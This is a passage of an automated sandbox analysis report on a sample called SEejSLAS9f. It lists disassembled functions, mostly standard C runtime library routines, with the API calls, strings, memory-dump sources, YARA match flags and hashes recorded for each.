Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024A3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 34582cfed4f7afd47f8a04efedb635044b3869a79fde31d04e057d8cd1e16a32
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: DCC1C070E04349AFDF12DFADC850BAEBFB1AF1A304F04419AE414AB391E7749941CB61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 0248C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0248C6DC
atomic_compare_exchange.LIBCONCRT ref: 0248C700
std::_Cnd_initX.LIBCPMT ref: 0248C711
std::_Cnd_initX.LIBCPMT ref: 0248C71F

Part of subcall function 02471370: __Mtx_unlock.LIBCPMT ref: 02471377

std::_Cnd_initX.LIBCPMT ref: 0248C72F

Part of subcall function 0248C3EF: __Cnd_broadcast.LIBCPMT ref: 0248C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0248C73D

Strings

t#D, xrefs: 0248C6C2

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: f569ce9ec2b7a229be66d557a78a16237813ca616791f7b0fe54a863ae9fede2
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 1101F771910605ABDB15B7B6CDC4BDEB35EAF00310F54001BE91597680DBB4AA158FA2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024A1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

_free.LIBCMT ref: 024A1444
_free.LIBCMT ref: 024A145D
_free.LIBCMT ref: 024A148F
_free.LIBCMT ref: 024A1498
_free.LIBCMT ref: 024A14A4

Strings

C, xrefs: 024A1291

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 5116b0abada86bb7d165f5444f58669002a187c5d5234c72b7cf3bd9fb6791e7
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 2DB12775A012299FDB24DF18C894BAEB7B5FB18304F1445AED84DA7390E770AE90CF40

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024AA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA184
_free.LIBCMT ref: 024AA192
_free.LIBCMT ref: 024AA2C0
_free.LIBCMT ref: 024AA2CB

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 98b794772e495da6d9d74359f85992a6912aa08e5e2d37ba04da51f5fbb31c89
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: D061D272900215AFDB20CFA9C851B9ABBF6FF59710F2441ABE844EB341E771A991CB50

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024A3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0249C4A4,E0830C40,?,?,?,?,?,?,024A425F,0247E03C,0249C4A4,?,0249C4A4,0249C4A4,0247E03C), ref: 024A3B2C
__fassign.LIBCMT ref: 024A3BA7
__fassign.LIBCMT ref: 024A3BC2
WideCharToMultiByte.KERNEL32(?,00000000,0249C4A4,00000001,?,00000005,00000000,00000000), ref: 024A3BE8
WriteFile.KERNEL32(?,?,00000000,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C07
WriteFile.KERNEL32(?,0247E03C,00000001,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C40

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 84bc4c91e45cf4b55f8d9e45d862e0fafb45de2b319ebaeded20b911245305d8
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: D351E575A00208AFDB10CFA8DC94AEEBBF5EF19700F14415FE555E7291E7309A81CB60

Function 02494AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02494ACD

Part of subcall function 02494D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02494800), ref: 02494DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02494AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02494AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02494B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02494BC3

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 27807ad9f185a068bac2a013616ef9592b8f6e11a618ce762696f387e6df2841
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 4331B439A002149BCF04EF69C885B6E7BB6FF44714F20456BD9259B381DB70EA06CB94

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024AFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: a3147bb91cd1a6b519d6c0c9a95b65df1d0121d9278bc457663a3614d2c08a48
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: CB11D632605125BFDB216F778C5896B7E6DFF96B61B110A2BFC15C7240DB318845CAB0

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 024AA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024AA331: _free.LIBCMT ref: 024AA35A

_free.LIBCMT ref: 024AA638

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA643
_free.LIBCMT ref: 024AA64E
_free.LIBCMT ref: 024AA6A2
_free.LIBCMT ref: 024AA6AD
_free.LIBCMT ref: 024AA6B8
_free.LIBCMT ref: 024AA6C3

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 90cb78883c5bddc800448d2ed1f22daa0a4e3ce3442c1cc19a09dbb4cb2cb69a
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 95115471644B14AEDE30BB73CC65FCF7BAEDF10740F40082EA399AA150E6A5B5148F60

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
GetLastError.KERNEL32 ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
GetLastError.KERNEL32 ref: 0041243D
GetLastError.KERNEL32 ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 02482659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02482667
GetLastError.KERNEL32 ref: 0248266D
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0248269A
GetLastError.KERNEL32 ref: 024826A4
GetLastError.KERNEL32 ref: 024826B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024826CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024826DA

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 8dc18062fd9b7cdba8f2f580983486f902d54a21e93f80d3fddfda5678792448
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: F001A735511155ABD720FF66EC48FAF3B68AF42F52B50042BF815F2160DBA4D9048AA8

Function 024824A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 6321cb032b3ac6266bcb91948c46b14e9a90c03f5cc25f99a1529d2fb501224a
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: E6F086759103503FB7117B75AD9991F3FEDDD46A22310062BF811E2291EBB585018558

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

F(@, xrefs: 0040C651
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::eofbit set, xrefs: 0040C649
ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C61B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024A239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024A25EC,00000001,00000001,?), ref: 024A23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024A25EC,00000001,00000001,?,?,?,?), ref: 024A247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024A2575
__freea.LIBCMT ref: 024A2582

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

__freea.LIBCMT ref: 024A258B
__freea.LIBCMT ref: 024A25B0

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: 40e7b135655f72d68db524e9ecd5f702624e90b039579bb94eea031907e1d748
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: CA510472A00216ABDB29CF64CC70EBF77AAFB64714F154A2AFC04D6240DBB4DD41EA50

Function 0249E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0249E445
__cftoe.LIBCMT ref: 0249E477

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: b09589567857bce42739b3ca8f4f7854c34ce075a3fd7c49df6bd92b9c8ab05f
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 8851E732A00205ABDF24DFA98C44BAF7FA9EF49774F14426FE81596281EB31D9418A64

Function 0249302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02493051

Part of subcall function 02488AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02488ABD

SafeSQueue.LIBCONCRT ref: 0249306A
Concurrency::location::_Assign.LIBCMT ref: 0249312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02493159

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: f17f68f332ad765b17bc766c602b2384a19cf259f4d76f71caa23b54ebd08521
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 9B31FD31A00A119FCF25EF69C884AAEBFB1EF45710F00859ED80A8B291DB70E845CFC0

Function 02475437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

